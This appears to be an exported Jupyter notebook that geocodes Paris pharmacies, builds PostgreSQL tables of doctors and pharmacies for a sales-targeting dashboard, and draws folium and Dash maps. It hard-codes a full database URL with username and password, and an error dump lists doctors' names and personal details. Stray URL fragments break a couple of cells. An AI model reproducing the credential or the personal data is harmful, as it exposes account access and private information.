18  19  PHARMACIE COURCELLES DEMOURS  2052090  162 RUE DE COURCELLES  75017  PARIS  01 47 63 60 67  75PER       3       1        1     1  [2023-09-20 14:00:00] 2023-11-08 12:00:00  NaN  NaN               931                  52             3126                19                814                   49              2458                 36               1031             2489                 39         4     IPHARM        NaN

In [101]:
def get_pharmacy(phaId):
    return pd.DataFrame(pharmacies[pharmas["id"] == phaId])

In [102]:
pharmas["lat"] = pd.Series(dtype=float)
pharmas["lon"] = pd.Series(dtype=float)

errors = []
for i, row in tqdm(pharmas.iterrows(), total=len(pharmas)):
    adr = row["adr"] + " " + str(row["cp"]) + " " +row["ville"]
    try:
        location = geolocator.geocode(adr)
        if location is not None:
            pharmas.loc[i, "lat"] = location.latitude
            pharmas.loc[i, "lon"] = location.longitude
        else:
            errors.append(i)
            print(f"problem at index {i} with adress {adr}")
    except:
        errors.append(i)
        print(f"problem at index {i} with adress {adr}")

  0%|          | 0/393 [00:00<?, ?it/s]

problem at index 102 with adress 133 AVENUE DES CHAMPS ELYSEES 75380 PARIS CEDEX 08
problem at index 261 with adress 7 PLACE DE FONTENOY 75352 PARIS SP 07
problem at index 262 with adress 126 RUE DE L UNIVERSITE 75355 PARIS SP 07
problem at index 267 with adress 7 ESPLANADE HENRI FRANCE 75907 PARIS CEDEX 15
problem at index 275 with adress 1 PLACE JOFFRE 75700 PARIS SP 07
problem at index 279 with adress 25 27 BOULEVARD VICTOR HUGO 92523 NEUILLY SUR SEINE CEDEX
problem at index 280 with adress 37 RUE DES VOLONTAIRES 75725 PARIS CEDEX 15
problem at index 282 with adress 149 RUE DE SEVRES 75743 PARIS CEDEX 15
problem at index 289 with adress 1 ALLEE PIERRE BURELLE 92306 LEVALLOIS PERRET CEDEX
problem at index 297 with adress 45 RUE KLEBER 92309 LEVALLOIS PERRET CEDEX

In [103]:
pharmas.loc[102, 'cp'] = 75008
pharmas.loc[102, 'ville'] = "PARIS"

pharmas.loc[279, 'cp'] = 92500
pharmas.loc[279, 'ville'] = "NEUILLY SUR SEINE"

for i in [261,262,275]:
    pharmas.loc[i, 'cp'] = 75007
    pharmas.loc[i, 'ville'] = "PARIS"

for i in [267, 280, 282]:
    pharmas.loc[i, 'cp'] = 75015
    pharmas.loc[i, 'ville'] = "PARIS"

for i in [289, 297]:
    pharmas.loc[i, 'cp'] = 92300
    pharmas.loc[i, 'ville'] = "LEVALLOIS PERRET"

In [104]:
errors

[102, 261, 262, 267, 275, 279, 280, 282, 289, 297]

In [112]:
for i in errors:
    row = pharmas.loc[i]
    adr = row["adr"] + " " + str(row["cp"]) + " " +row["ville"]
    try:
        location = geolocator.geocode(adr)
        if location is not None:
            pharmas.loc[i, "lat"] = location.latitude
            pharmas.loc[i, "lon"] = location.longitude
            errors.remove(i)
        else:
            errors.append(i)
            print(f"problem at index {i} with adress {adr}")
    except:
        errors.append(i)
        print(f"problem at index {i} with adress {adr}")

In [113]:
errors

[]

# SQLITE DATABASE

In [125]:
from application.config import basedir
from dotenv import load_dotenv

load_dotenv(os.path.join(basedir, '.env'))
DATABASE_URL = "postgresql://ldtjxvwgkspwhv:07d61075e4f3769db26e48ae350c6d5303e1911514fc3dd91405b4c21112c30b@ec2-52-206-38-187.compute-1.amazonaws.com:5432/de1ljci8vbn9ro"
engine = create_engine(DATABASE_URL)

True

## check DB

In [128]:
from sqlalchemy import inspect, TIMESTAMP, extract
inspector = inspect(engine)

for table_name in inspector.get_table_names():
    print(table_name)

    #for column in inspector.get_columns(table_name):
        #print("Column: %s" % column['name'])

adresses
pharmacies
identities

## TO DATABASE

In [115]:
create_pharmas  ="""
CREATE TABLE pharmacies (
    id SERIAL PRIMARY KEY NOT NULL,
    nom TEXT NOT NULL,
    cip INTEGER,
    adr TEXT NOT NULL,
    cp INT NOT NULL,
    ville TEXT NOT NULL,
    tel TEXT,
    uga TEXT NOT NULL,
    cib_vm TEXT,
    cib_dp TEXT,
    cib_dso TEXT,
    nv22 TEXT,
    ddvs TEXT,
    ddv TIMESTAMP,
    dpv TIMESTAMP,
    rdv TIMESTAMP,
    ca_circ_cma_fev23 TEXT,
    rang_ca_circ_fev23 TEXT,
    ca_ul_cma_fev_23 TEXT,
    rang_ca_ul_fev23 TEXT,
    ca_circ_cma_juin23 TEXT,
    rang_ca_circ_juin23 TEXT,
    ca_ul_cma_juin_23 TEXT,
    rang_ca_ul_juin23 TEXT,
    ca_circ_cma_sept23 TEXT,
    ca_ul_cma_sept23 TEXT,
    rang_ca_ul_sept23 TEXT,
    decil_23 TEXT,
    groupement TEXT,
    contrat_23 TEXT,
    lat REAL,
    lon REAL,
    created_on TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    updated_on TIMESTAMP DEFAULT CURRENT_TIMESTAMP
    );
"""

In [116]:
create_id  ="""
CREATE TABLE identities (
    id SERIAL PRIMARY KEY NOT NULL,
    titre TEXT,
    nom TEXT NOT NULL,
    prenom TEXT,
    spe TEXT,
    tend TEXT,
    pot INTEGER,
    pvm INTEGER,
    nv22 INTEGER,
    cib INTEGER,
    dec TEXT,
    mix TEXT,
    dip INTEGER,
    nais INTEGER,
    mail TEXT,
    created_on TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    updated_on TIMESTAMP DEFAULT CURRENT_TIMESTAMP
    );
"""

In [117]:
create_ad = """
CREATE TABLE adresses (
    id SERIAL PRIMARY KEY NOT NULL,
    uga TEXT NOT NULL,
    eta TEXT,
    adr TEXT NOT NULL,
    cp INT NOT NULL,
    ville TEXT NOT NULL,
    tel TEXT,
    par1 TEXT,
    par2 TExT,
    lat REAL,
    lon REAL,
    created_on TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    updated_on TIMESTAMP DEFAULT CURRENT_TIMESTAMP
    );
"""

In [118]:
create_cd  = """
CREATE TABLE cdbs (
    id INTEGER PRIMARY KEY NOT NULL,
    mode TEXT,
    com TEXT,
    ddv TIMESTAMP,
    ddvs TEXT,
    dpv TIMESTAMP,
    rdv TEXT,
    rec TEXT,
    pk TEXT,
    lun_mat TEXT,
    lun_am TEXT,
    mar_mat TEXT,
    mar_am TEXT,
    mer_mat TEXT,
    mer_am TEXT,
    jeu_mat TEXT,
    jeu_am TEXT,
    ven_mat TEXT,
    ven_am TEXT,
    created_on TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    updated_on TIMESTAMP DEFAULT CURRENT_TIMESTAMP
    );
"""

In [119]:
create_map = """
CREATE TABLE connections (
    id INTEGER PRIMARY KEY NOT NULL,
    doc_id INTEGER NOT NULL,
    adr_id INTEGER NOT NULL,
    cdb_id INTEGER NOT NULL,
    FOREIGN KEY(doc_id) REFERENCES identities(id),
    FOREIGN KEY(adr_id) REFERENCES adresses(id),
    FOREIGN KEY(cdb_id) REFERENCES cdbs(id),
    created_on TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    updated_on TIMESTAMP DEFAULT CURRENT_TIMESTAMP
    );
"""

In [120]:
create_users = """
CREATE TABLE users (
    id SERIAL PRIMARY KEY NOT NULL,
    username TEXT,
    email TEXT NOT NULL,
    password_hash TEXT NOT NULL,
    last_seen TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    token TEXT,
    token_expiration TIMESTAMP,
    about_me TEXT
    );
"""

## Create Tables if needed

In [122]:
import psycopg2

In [129]:
try:
    for table in ["adresses", "pharmacies", "identities", "cdbs", "connections"]:
        query=f"DROP TABLE {table};"
        with engine.connect() as connexion:
            connexion.execute(text(query))
            connexion.commit()
except psycopg2.Error as error:
    print('Error occurred - ', error)

In [130]:
try:
    for query in [create_pharmas, create_id, create_ad, create_cd, create_map, create_users]:
        with engine.connect() as connection:
            connection.execute(text(query))
            connection.commit()
except psycopg2.Error as error:
    print('Error occurred - ', error)

## populate DB from DF

In [131]:
identities.to_sql('identities', engine, if_exists='append', index=False)

ProgrammingError: (psycopg2.errors.UndefinedColumn) column "tend" of relation "identities" does not exist
LINE 1: ...ERT INTO identities (id, titre, nom, prenom, spe, tend, pot,...
                                                             ^

[SQL: INSERT INTO identities (id, titre, nom, prenom, spe, tend, pot, pvm, nv22, cib, dec, mix, dip, nais, mail) VALUES (%(id__0)s, %(titre__0)s, %(nom__0)s, %(prenom__0)s, %(spe__0)s, %(tend__0)s, %(pot__0)s, %(pvm__0)s, %(nv22__0)s, %(cib__0)s, %(dec__0) ... 218112 characters truncated ... %(nv22__999)s, %(cib__999)s, %(dec__999)s, %(mix__999)s, %(dip__999)s, %(nais__999)s, %(mail__999)s)]
[parameters: {'tend__0': '', 'mix__0': 'Ville', 'mail__0': '', 'titre__0': 'Docteur', 'nais__0': 65, 'spe__0': 'MG', 'pot__0': 333, 'nom__0': 'HAZEN', 'pvm__0': 37, 'dec__0': '', 'id__0': 1, 'cib__0': '', 'prenom__0': 'Richard', 'dip__0': 35, 'nv22__0': '', 'tend__1': '', 'mix__1': 'Mixte', 'mail__1': '', 'titre__1': 'Docteur', 'nais__1': 61, 'spe__1': 'PE', 'pot__1': 152, 'nom__1': 'MICHOT', 'pvm__1': 10, 'dec__1': '', 'id__1': 2, 'cib__1': 3, 'prenom__1': 'Anne Sylvestre', 'dip__1': 25, 'nv22__1': 2, 'tend__2': '', 'mix__2': '', 'mail__2': '', 'titre__2': '', 'nais__2': '', 'spe__2': 'GY', 'pot__2': 93, 'nom__2': 'ZANA', 'pvm__2': 6, 'dec__2': '', 'id__2': 3, 'cib__2': 3, 'prenom__2': 'Jacques', 'dip__2': '', 'nv22__2': 1, 'tend__3': 'Pédiatrie', 'mix__3': 'Ville', 'mail__3': '', 'titre__3': 'Docteur', 'nais__3': 73 ... 14900 parameters truncated ... 'id__996': 997, 'cib__996': '', 'prenom__996': 'Laura', 'dip__996': '', 'nv22__996': '', 'tend__997': '', 'mix__997': '', 'mail__997': '', 'titre__997': '', 'nais__997': '', 'spe__997': 'PE', 'pot__997': 151, 'nom__997': 'DORVAL', 'pvm__997': 1, 'dec__997': '', 'id__997': 998, 'cib__997': '', 'prenom__997': 'Guillaume', 'dip__997': '', 'nv22__997': '', 'tend__998': '', 'mix__998': '', 'mail__998': '', 'titre__998': '', 'nais__998': '', 'spe__998': 'PE', 'pot__998': 151, 'nom__998': 'EGOUNLETY', 'pvm__998': 1, 'dec__998': '', 'id__998': 999, 'cib__998': '', 'prenom__998': 'Fidelia', 'dip__998': '', 'nv22__998': '', 'tend__999': '', 'mix__999': 'Ville', 'mail__999': '', 'titre__999': 'Docteur', 'nais__999': 37, 'spe__999': 'PE', 'pot__999': 151, 'nom__999': 'ELOI', 'pvm__999': 1, 'dec__999': '', 'id__999': 1000, 'cib__999': '', 'prenom__999': 'Maxime', 'dip__999': 2023, 'nv22__999': ''}]
(Background on this error at: https://sqlalche.me/e/20/f405)

In [ ]:
adresses.to_sql('adresses', engine, if_exists='append', index=False)

In [ ]:
cdbs.to_sql('cdbs', engine, if_exists='append', index=False)

In [ ]:
connections.to_sql('connections', engine, if_exists='append', index=False)

In [ ]:
pharmas.to_sql('pharmacies', engine, if_exists='append', index=False)

## CSV backup

In [ ]:
identities.to_csv('application//data/csv/identities.csv', sep=";", index=False)
adresses.to_csv('application//data/csv/adresses.csv', sep=";", index=False)
cdbs.to_csv('application//data/csv/cdbs.csv', sep=";", index=False)
connections.to_csv('application//data/csv/connections.csv', sep=";", index=False)

## from CSV

In [ ]:
identities=pd.read_csv('application/data/csv/identities.csv', sep=";")
adresses=pd.read_csv('application/data/csv/adresses.csv', sep=";")
cdbs=pd.read_csv('application/data/csv/cdbs.csv', sep=";")
connections=pd.read_csv('application/data/csv/connections.csv', sep=";")

In [ ]:
identities.sample(10)
adresses.sample(10)
cdbs.sample(10)
connections.sample(10)

# QUERIES

In [ ]:
from application.dash.biocodex.functions import get_pharmas

pharmas = get_pharmas()
pharmas.shape

In [ ]:
with Session.begin() as session:
    df = pd.read_sql_query(
        sql=session.query(
            Identity.nom, TIMESTAMP(Cdb.ddv), TIMESTAMP(Cdb.dpv)
        ).join(Cdb).where(Cdb.id==45).statement,
        con=engine
    )

In [ ]:
session.close()

In [ ]:
with Session.begin() as session:
    id_adr = pd.read_sql_query(
        sql=session.query(
            Connections.doc_id, Identity.nom, Identity.prenom, Identity.spe, Identity.pot, Identity.pvm,
            Identity.nv22, Identity.cib, Identity.dec, Adress.eta, Adress.uga, Adress.adr, Adress.cp, Adress.ville, Adress.tel,
            Adress.lat, Adress.lon
        ).join(Identity).join(Adress).statement,
        con=engine
    )
    session.close()
id_adr.columns

In [ ]:
with engine.connect() as conn, conn.begin():
    df = pd.read_sql(text(q), conn)

## FROM DATABASE

    from sqlalchemy import inspect
    inspector = inspect(engine)
    schemas = inspector.get_schema_names()

    for schema in schemas:
        print("schema: %s" % schema)
        for table_name in inspector.get_table_names(schema=schema):
            for column in inspector.get_columns(table_name, schema=schema):
                print("Column: %s" % column)

    from sqlalchemy import select
    from sqlalchemy.orm import Session

    with Session(engine) as session:
        # query for ``User`` objects
        statement = select(Identity).filter_by(prenom="Dominique")

        # list of Row objects
        rows = session.execute(statement).all()

In [ ]:
ugas_selected = ['75TER']
spe_selected = ['GY', 'MG-GY', 'SF', 'MG', 'GE', 'PE', 'PSY', 'PE-PSY']
cib_selected =  [1, 2, 3, 4]

In [ ]:
df1 = df.query('uga in @ugas_selected')
len(df1)

In [ ]:
df2 = df1.query('spe in @spe_selected')
len(df2)

In [ ]:
df3 = df2.query('cib in @cib_selected')
len(df3)

In [ ]:
pvm_range = [0, 39]

In [ ]:
df4 = df3.query('pvm > @pvm_range[0]'' and pvm < @pvm_range[1]')

# PREPARE DATA (again!)

In [ ]:
from application.dash.biocodex.functions import discrete_background_color_bins, build_tile_back, build_tile_front, doctor_colors
from application.dash.biocodex.functions import generate_html_table_from_df, join_id_adr_cdb, styles, legend1, legend2, readable_ts

In [ ]:
df = join_id_adr_cdb()

In [ ]:
def prepare_data(df):

    df['nv22'] = np.where(df['nv22'] == 0, '', df["nv22"])
    df['nv22'] = [int(nv) if nv != '' else '' for nv in df['nv22']]

    df['cib'] = np.where(df['cib'] == 0, 'HC', df["cib"])
    df['cib'] = [int(c) if c != 'HC' else 'HC' for c in df['cib']]

    df['rdv'] = ['\u2705' if pd.isnull(row['dpv']) == 0 else '' for i, row in df.iterrows()]
    
    df["ddv"] = [readable_ts(row) if pd.isnull(row) == 0 else '' for row in df['ddv'].values]
    df["dpv"] = [readable_ts(row) if pd.isnull(row) == 0 else '' for row in df['dpv'].values]

    df.sort_values(['uga', 'adr', 'spe', 'pot', 'pvm'], ascending=[True, True, True, False, False], inplace=True)

    return df

In [ ]:
dff = prepare_data(df)

In [ ]:
dff[dff['ddv'].isna()]

In [ ]:
type(dff.loc[21,'ddv'])

    df['ddv'] = np.where(df['ddv']==0, '', df["ddv"])
    df['ddv'] = [int(nv) if nv != '' else '' for nv in df['ddv']]

    df['dpv'] = np.where(df['dpv']==0, '', df["dpv"])
    df['dpv'] = [int(c) if c != '' else '' for c in df['dpv']]

In [ ]:
display_cols = ['doc_id', 'nom', 'prenom', 'spe', 'pot', 'pvm', 'nv22', 'cib', 'dec', 'mode', 'com', 'ddv', 'dpv', 'rdv', 'rec', 'pk', 'eta', 'uga', 'adr', 'cp', 'ville', 'tel']

In [ ]:
df[display_cols].head()

In [ ]:
def unix_to_dt(unix):
    from datetime import datetime
    if type(unix) == str:
        ts = int(unix)
    else:
        ts = unix
    return datetime.utcfromtimestamp(ts).strftime('%d/%m/%Y %H:%M')

# PHARMACIES

In [ ]:
pharma = pd.read_csv("/home/julien/website/app/data/csv/pharmacies.csv", sep=";")

pharma["lat"] = pd.Series(dtype=float)
pharma["lon"] = pd.Series(dtype=float)

pharma.columns

from tqdm.notebook import tqdm, trange

from geopy.geocoders import Nominatim
geolocator = Nominatim(user_agent="mySecretAgent")

for i, row in tqdm(pharma.iterrows(), total=len(pharma)):
    adr = row["adresse"] + " " + str(row["cp"]) + " " +row["ville"]
    location = geolocator.geocode(adr)
    if location is not None:
        pharma.loc[i, "lat"] = location.latitude
        pharma.loc[i, "lon"] = location.longitude
    else:
        print(i, adr)

pharma.head()

# FOLIUM

In [ ]:
ciblage.sample()
pharma.sample()

In [ ]:
import numpy as np
import pandas as pd
import folium

color : str, default 'blue'
    The color of the marker. You can use:

        ['red', 'blue', 'green', 'purple', 'orange', 'darkred',
         'lightred', 'beige', 'darkblue', 'darkgreen', 'cadetblue',
         'darkpurple', 'white', 'pink', 'lightblue', 'lightgreen',
         'gray', 'black', 'lightgray']

icon_color : str, default 'white'
    The color of the drawing on the marker. You can use colors above,
    or an html color code.
      
icon : str, default 'info-sign'
    The name of the marker sign.
    See Font-Awesome website to choose yours.
    Warning : depending on the icon you choose you may need to adapt
    the `prefix` as well.  
    
angle : int, default 0
    The icon will be rotated by this amount of degrees.  
    
prefix : str, default 'glyphicon'
    The prefix states the source of the icon. 'fa' for font-awesome or
    'glyphicon' for bootstrap 3.

In [ ]:
data = df.to_dict('records')

In [ ]:
dff = pd.DataFrame(data)
dff.head()

In [ ]:
map = folium.Map(
    location=[
        ciblage["lat"].mean(), 
        ciblage["lon"].mean()
    ],
    zoom_start=12,
    control_scale=True
)

# Loop through each row in the dataframe
for i,row in pharma.iterrows():
    #Setup the content of the popup
    iframe = folium.IFrame('Nom:\t' + str(row["nom"]) + '\nUGA:\t ' + str(row["uga"]))
    
    #Initialise the popup using the iframe
    popup = folium.Popup(iframe, min_width=300, max_width=300)
    
    #Add each row to the map
    folium.Marker(
        location=[row['lat'],row['lon']],
        popup=popup,
        icon=folium.Icon(color="green", prefix="fa", icon="prescription-bottle-alt")
    ).add_to(map)

In [ ]:
icon=folium.Icon(color="green", prefix="fa", icon="prescription-bottle-alt")

icon.to_json()

In [ ]:
map

In [ ]:
spe_to_color={
    "GY": "pink",
    "MG-GY": "pink",
    "SF": "pink",
    "MG": "gray",
    "PE": "lightblue",
    "GE": "orange",
    "PE_PSY": "darkblue",
    "NE": "darkpurple"
}

In [ ]:
ciblage["spe"].unique()

In [ ]:
# Loop through each row in the dataframe
for i,row in ciblage[ciblage["uga"]=="75GRE"].iterrows():

    spe = row["spe"]
    #Setup the content of the popup
    iframe = folium.IFrame(f'{row["nom"]} {row["prenom"]}\n{row["spe"]}')
    
    #Initialise the popup using the iframe
    popup = folium.Popup(iframe, min_width=300, max_width=300)
    
    #Add each row to the map
    folium.Marker(
        location=[row['lat'],row['lon']],
        popup=popup,
        icon=folium.Icon(color=spe_to_color[spe], prefix="fa", icon="user-md")
    ).add_to(map)

In [ ]:
map

In [ ]:
with open("test.html", "w") as f:
    f.write(map._repr_html_())

# DASH

In [ ]:
from app.dashboards.biocodex.models import Identity, Adress, Cdb, Connections

In [ ]:
from dash import Dash, html, Input, Output, callback, State
from dash.exceptions import PreventUpdate
import dash_bootstrap_components as dbc

from dash import Dash, html, dcc, dash_table

In [ ]:
from ipyleaflet import AwesomeIcon, Marker, Map

In [ ]:
map = Map(center=[ciblage["lat"].mean(), ciblage["lon"].mean()], zoom=12)

In [ ]:
from ipyleaflet import Map, basemaps, basemap_to_tiles

m = Map(
    basemap=basemap_to_tiles(basemaps.OpenStreetMap.Mapnik),
    center=(48.204793, 350.121558),
    zoom=3
    )
m

In [ ]:
from dash_iconify import DashIconify

In [ ]:
children = [dl.TileLayer()]

In [ ]:
icon=DashIconify(
            
                icon="ion:logo-github",
                width=30,
                height=30,
                rotate=1,
                flip="horizontal",
            )

In [ ]:
from cairosvg import svg2png

In [ ]:
svg_code = """
    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" loading_state="[object Object]" class="iconify iconify--ion" width="30" height="30" preserveAspectRatio="xMidYMid meet" viewBox="0 0 512 512"><g transform="rotate(90 256 256) translate(512 0) scale(-1 1)"><path fill="currentColor" d="M256 32C132.3 32 32 134.9 32 261.7c0 101.5 64.2 187.5 153.2 217.9a17.56 17.56 0 0 0 3.8.4c8.3 0 11.5-6.1 11.5-11.4c0-5.5-.2-19.9-.3-39.1a102.4 102.4 0 0 1-22.6 2.7c-43.1 0-52.9-33.5-52.9-33.5c-10.2-26.5-24.9-33.6-24.9-33.6c-19.5-13.7-.1-14.1 1.4-14.1h.1c22.5 2 34.3 23.8 34.3 23.8c11.2 19.6 26.2 25.1 39.6 25.1a63 63 0 0 0 25.6-6c2-14.8 7.8-24.9 14.2-30.7c-49.7-5.8-102-25.5-102-113.5c0-25.1 8.7-45.6 23-61.6c-2.3-5.8-10-29.2 2.2-60.8a18.64 18.64 0 0 1 5-.5c8.1 0 26.4 3.1 56.6 24.1a208.21 208.21 0 0 1 112.2 0c30.2-21 48.5-24.1 56.6-24.1a18.64 18.64 0 0 1 5 .5c12.2 31.6 4.5 55 2.2 60.8c14.3 16.1 23 36.6 23 61.6c0 88.2-52.4 107.6-102.3 113.3c8 7.1 15.2 21.1 15.2 42.5c0 30.7-.3 55.5-.3 63c0 5.4 3.1 11.5 11.4 11.5a19.35 19.35 0 0 0 4-.4C415.9 449.2 480 363.1 480 261.7C480 134.9 379.7 32 256 32Z"></path></g></svg>
"""

svg2png(bytestring=svg_code,write_to='output.png')

In [ ]:
custom_icon = dict(
    iconUrl='output.png',
    # shadowUrl='https://leafletjs.com/examples/custom-icons/leaf-shadow.png',
    iconSize=[38, 95],
    shadowSize=[50, 64],
    iconAnchor=[22, 94],
    shadowAnchor=[4, 62],
    popupAnchor=[-3, -76]
)

In [ ]:
for i,row in pharma.iterrows():
    #Setup the content of the popup
    #iframe = folium.IFrame('Nom:\t' + str(row["nom"]) + '\nUGA:\t ' + str(row["uga"]))
    
    #Initialise the popup using the iframe
    #popup = folium.Popup(iframe, min_width=300, max_width=300)
    
    #Add each row to the map
    children.append(
        dl.Marker(
            icon=custom_icon,
            position=[row['lat'],row['lon']],
        )
    )

In [ ]:
#BOOTSTRAP LAYOUT EXAMPLE

app = Dash(external_stylesheets=[dbc.themes.CERULEAN, {"href":"app/static/css/custom.css", "type": "tex/css"}])

app.layout = \
dbc.Container\
([
    dl.Map(children, center=[ciblage["lat"].mean(), ciblage["lon"].mean()], zoom=12, style={'height': '50vh'}),
    html.Br(),
    dbc.Row([
    dbc.Col([dbc.Button("row 1 col 1",style={"width":"100%"})],width=3),
    dbc.Col([dbc.Button("row 1 col 2", style={"width": "100%"})],width=3),
    dbc.Col([dbc.Button("row 1 col 3",style={"width":"100%"})],width=3),
    dbc.Col([dbc.Button("row 1 col 4",style={"width":"100%"})],width=3),
    ]),
    html.Br(),
    dbc.Row([
    dbc.Col([dbc.Button("row 2 col 1",style={"width":"100%"})],width=3),
    dbc.Col([dbc.Button("row 2 col 2", style={"width": "100%"})],width=3),
    dbc.Col([dbc.Button("row 2 col 3",style={"width":"100%"})],width=6),
    ]),
    html.Br(),
    dbc.Row([
    dbc.Col([dbc.Button("row 3 col 1",style={"width":"100%"})],width=9),
    dbc.Col([dbc.Button("row 3 col 2", style={"width": "100%"})],width=3),
    ])
])

if __name__ == "__main__":
    app.run_server(debug=False, port=8050, host='0.0.0.0')

In [ ]:
def discrete_background_color_bins(df, n_bins=5, columns='all', colorscale="Blues"):
    import colorlover
    bounds = [i * (1.0 / n_bins) for i in range(n_bins + 1)]
    if columns == 'all':
        if 'id' in df:
            df_numeric_columns = df.select_dtypes('number').drop(['id'], axis=1)
        else:
            df_numeric_columns = df.select_dtypes('number')
    else:
        df_numeric_columns = df[columns]
    df_max = df_numeric_columns.max().max()
    df_min = df_numeric_columns.min().min()
    ranges = [
        ((df_max - df_min) * i) + df_min
        for i in bounds
    ]
    styles = []
    legend = []
    for i in range(1, len(bounds)):
        min_bound = ranges[i - 1]
        max_bound = ranges[i]
        backgroundColor = colorlover.scales[str(n_bins)]['seq'][colorscale][i - 1]
        color = 'white' if i > len(bounds) / 2. else 'black'

        for column in df_numeric_columns:
            styles.append({
                'if': {
                    'filter_query': (
                        '{{{column}}} >= {min_bound}' +
                        (' && {{{column}}} < {max_bound}' if (i < len(bounds) - 1) else '')
                    ).format(column=column, min_bound=min_bound, max_bound=max_bound),
                    'column_id': column
                },
                'backgroundColor': backgroundColor,
                'color': color
            })
        legend.append(
            html.Div(style={'display': 'inline-block', 'width': '60px'}, children=[
                html.Div(
                    style={
                        'backgroundColor': backgroundColor,
 org/en/14/orm/internals.html                       'borderLeft': '1px rgb(50, 50, 50) solid',
                        'height': '10px'
                    }
                ),
                html.Small(round(min_bound, 2), style={'paddingLeft': '2px'})
            ])
        )

    return (styles, html.Div(legend, style={'padding': '5px 0 5px 0'}))

In [ ]:
id_adr = join_id_adr()

In [ ]:
(styles1, legend1) = discrete_background_color_bins(id_adr, n_bins=9, columns=["pvm"])
(styles2, legend2) = discrete_background_color_bins(id_adr, n_bins=9, columns=["pot"], colorscale="YlGn")
styles = styles1 + styles2

In [ ]:
spe_options = [{"label": val, "value": val} for val in [id_adr["spe"].unique().tolist()[i] for i in [6, 3, -1, 1 ,-2 ,5 ,4 ,0 ,2]]]
uga_options = [{"label": val, "value": val} for val in id_adr["uga"].unique().tolist()]
cp_options = [{"label": val, "value": val} for val in id_adr["cp"].unique().tolist()]
ville_options = [{"label": val, "value": val} for val in id_adr["ville"].unique().tolist()]

In [ ]:
CSS = """
.dash-spreadsheet.dash-freeze-top, .dash-spreadsheet.dash-virtualized { max-height: inherit !important; }    
.dash-table-container {max-height: calc(100vh - 125px);}
"""
HTML('<style>{}</style>'.format(CSS))

In [ ]:
app = Dash(__name__, external_stylesheets=[dbc.themes.CYBORG])

app.layout = dbc.Container(
    [
        dbc.Row(
            [
                dbc.Col(
                    [
                        dbc.Label("SPÉCIALITÉS", className="fw-bold"),
                        dcc.Checklist(
                            options=spe_options,
                            value=[spe_options[3]["value"]],
                            id="spe_dd",
                            inline=True,
                            inputStyle={"margin-right": "5px"},
                            labelStyle={"margin-right": "5px"}
                        ),
                        html.Br(),
                        dbc.Label("UGA", className="fw-bold"),
                        dcc.RadioItems(
                            options=uga_options,
                            value=[uga_options[i]["value"] for i in range(len(uga_options))],
                            id="uga_dd",
                            inline=True,
                            inputStyle={"margin-right": "5px"},
                            labelStyle={"margin-right": "5px"}
                        ),
                        html.Br(),
                        dbc.Label("PVM", className="fw-bold"),
                        legend1,
                        html.Br(),
                        dbc.Label("POTENTIEL", className="fw-bold"),
                        legend2
                    ],
                    width=2,
                    className="justify-content-evenly"
                ),
                dbc.Col(
                    [
                        dbc.Label("PROFESSIONNELS DE SANTÉ", className="fw-bold"),
                        dash_table.DataTable(
                            # data=id_adr.to_dict('records'),
                            columns=[{"name": i.upper(), "id": i} for i in id_adr.columns],
                            fixed_rows={'headers': True},
                            page_size=25,
                            style_table={'fontSize': 10, 'font-family': 'Verdana', 'height': '600px'},
                            style_data={"color": "black"},
                            style_data_conditional=styles,
                            style_header={'fontSize': 14, 'font_weight': 900, 'text-align': 'center',
                                          'color': 'darkblue'},
                            style_cell_conditional=[
                                {'if': {'column_id': 'id'}, 'textAlign': 'center', 'width': '45px'},
                                {'if': {'column_id': 'nom'}, 'textAlign': 'left', 'width': '220px'},
                                {'if': {'column_id': 'prenom'}, 'textAlign': 'left', 'width': '160px'},
                                {'if': {'column_id': 'spe'}, 'textAlign': 'center', 'width': '70px'},
                                {'if': {'column_id': 'pot'}, 'textAlign': 'center', 'width': '70px'},
                                {'if': {'column_id': 'pvm'}, 'textAlign': 'center', 'width': '70px'},
                                {'if': {'column_id': 'nv2022'}, 'textAlign': 'center', 'width': '70px'},
                                {'if': {'column_id': 'etablissement'}, 'textAlign': 'center', 'width': '160px',
                                 'textOverflow': 'ellipsis', 'fontSize': 10},
                                {'if': {'column_id': 'uga'}, 'textAlign': 'center', 'width': '70px', 'fontSize': 10},
                                {'if': {'column_id': 'adresse'}, 'textAlign': 'left', 'width': '230px', 'fontSize': 10},
                                {'if': {'column_id': 'cp'}, 'textAlign': 'center', 'width': '70px', 'fontSize': 10},
                                {'if': {'column_id': 'ville'}, 'textAlign': 'left', 'width': '70px', 'fontSize': 10},
                                {'if': {'column_id': 'tel'}, 'textAlign': 'center', 'width': '80px', 'fontSize': 10}
                            ],
                            css=[
                                {"selector": ".dash-spreadsheet-container tr th", "rule": "height: 16px;"},
                                # set height of header
                                {"selector": ".dash-spreadsheet-container tr", "rule": "height: 10px;"},
                                # set height of body rows
                                {"selector": ".dash-spreadsheet-inner", "rule": 'max-height: "calc(100vh - 226px)"'}
                            ],
                            id="datatable"
                        )
                    ],
                    width=9
                )
            ],
            class_name="d-flex justify-content-evenly flex-row"
        ),
        dbc.Row(

        )
    ],
    style={"margin": 20},
    fluid=True
)


@dashapp.callback(
    Output("datatable", "data"),
    Input("spe_dd", "value"),
    Input("uga_dd", "value")
)
def update_table(spes, ugas):

    id_adr = join_id_adr()

    print("selected", spes, ugas)

    if spes:
        id_adr = id_adr[id_adr["spe"].isin(spes)]
    else:
        id_adr = id_adr

    if ugas:
        if isinstance(ugas, str):
            ugas = [ugas]
        id_adr = id_adr[id_adr["uga"].isin(ugas)]
    else:
        id_adr = id_adr

    return id_adr.to_dict("records")


@app.callback(
    Output('user-store', 'data'),
    Input('my-dropdown', 'value'),
    State('user-store', 'data'))
def cur_user(args, data):
    if current_user.is_authenticated:
        return current_user.user

    
@app.callback(
    Output('username', 'children'), 
    Input('user-store', 'data')
)
def username(data):
    if data is None:
        return ''
    else:
        return f'Hello {data}'
        
app.run()org/en/14/orm/internals.html

In [ ]:
spe_options = [{"label": val, "value": val} for val in [id_adr["spe"].unique().tolist()[i] for i in [6, 3, -1, 1 ,-2 ,5 ,4 ,0 ,2]]]
uga_options = [{"label": val, "value": val} for val in id_adr["uga"].unique().tolist()]
datatable_cols =[{"name": i.upper(), "id": i} for i in id_adr.columns]

In [ ]:
